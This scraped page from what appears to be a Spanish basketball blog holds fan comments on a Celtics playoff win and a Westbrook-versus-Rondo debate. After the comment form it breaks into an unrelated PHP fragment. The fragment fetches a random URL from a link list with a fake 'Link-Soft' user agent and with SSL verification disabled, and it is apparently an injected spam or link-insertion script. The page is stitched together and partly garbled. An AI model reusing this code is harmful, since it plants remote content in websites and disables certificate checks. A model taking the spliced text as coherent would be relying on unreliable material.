    Increible los Celtics! siempre ha sido uno de esos equipos que me caian un poquito mal pero me están ganango poco a poco este año con un Rondo espectacular y un Big Three jugando por encima de sus limites fisico, increible.

      Citar

  33. GreenPride dice:
    #33

    Siiiiiiiiiiiii Increibles los Celtics. Todavía no puedo ni comentarlo porque tengo el corazón que se sale, qué nervios. Comenté que si llegaba el partido igualado al final los Celtics podían ganar por experiencia y mejores jugadas de Doc y así ha sido. Voy a serenarme y ya comentaré con más tiempo. Garnett se ha comido ha todo Miami y finalmente You can’t handle the Truth!!! Pufff, que grandes!!!

      Citar

  34. Nacho dice:
    #34

    Sancho88:

    @Nacho. No estoy de acuerdo con tu valoración sobre la aportación de Westbrook en la serie, o en el partido de anoche si queremos particularizar. Se comió a Parker con patatas en todos los aspectos, sobre todo en la primera parte. Además, reclamábamos que jugara con cabeza y buscara a sus compañeros. Eso, unido a una defensa valiosísima sobre Parker, valiéndose de la ayuda de Sefolosha, es justamente lo que hizo. Llegaba al ataque, se paraba, amenazaba, pasaba buscando a sus compañeros. Excelentes conexiones por momentos con Ibaka y Durant. Implicó a todos los jugadores, y eso que Durántula estaba fatal en la primera parte. Fue el alma de los Thunder para levantarse, aparte de Durant lógicamente.

    En serio, si pone la cabeza en su sitio, puede llegar a ser mejor que Rondo. No son comparables, pero yo diría que el conjunto de potencia-explosividad-tiro exterior-defensa y posible buena y constante lectura de juego a medio plazo no lo tiene ningún base en la liga, ni siquiera Rose o el propio Rondo. Tiene todos los ingredientes para llegar a ser un base superlativo, diferente a todo lo que hemos conocido. Yo nunca había visto un base como Westbrook, y lo mismo digo, o parecido con Rondo. Son una evolución brutal por físico, talento, potencia y defensa. Lo tienen todo todo, aunque Rondo es más director y Westbrook más pasional y anotador, lo cual no quiere decir que ya está mejorando bastante su visión de juego y en esta faceta tiene posibilidades infinitas.

    Supongo que en la discrepancia está la virtud.
    Yo considero a Westbrook como un muy buen jugador. Pero eso no quiere decir que me guste. Y es que no me gusta. Como no me gusta LeBron, y es infinitamente mejor. Ahí están los gustos.
    También creo que sería un magnífico jugador para un equipo como los Kings, incluso podría llevarlos a PO. (y el otro día no pedía un trade, si no que ponía a tu equipo como ejemplo)
    Tampoco he dicho que jugara mal en el 5º. He dicho que su último cuarto pudo haberle costado a OKC el partido. Y eso se ve. Nos guste o no. ¿Qué pudo haber puesto a su equipo en condiciones de ganar en los tres primeros cuartos? Pues te lo acepto. Pero es que esto que le pasó en el 5º le pasó también el 4º, sino recuerdo mal.
    ¿Que puede mejorar? Lo dudo, pero puede ser. ¿Que, salvando las distancias, le pasa lo mismo que a los Sergios en el Madrid? (es decir, en su virtud están los defectos/ o hacen cosas para lo bueno y para lo malo. Siendo en este aspecto el Ying y el Yang dos etereidades (sic) indisolubles? Pues vale. Pero por favos, no me lo compares con Rondo. Aunque solo sea por la debilidad que tengo por este chico desde hace mucho. Porque es un tipo que ha hecho que sea acérrimo de mi peor enemigo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>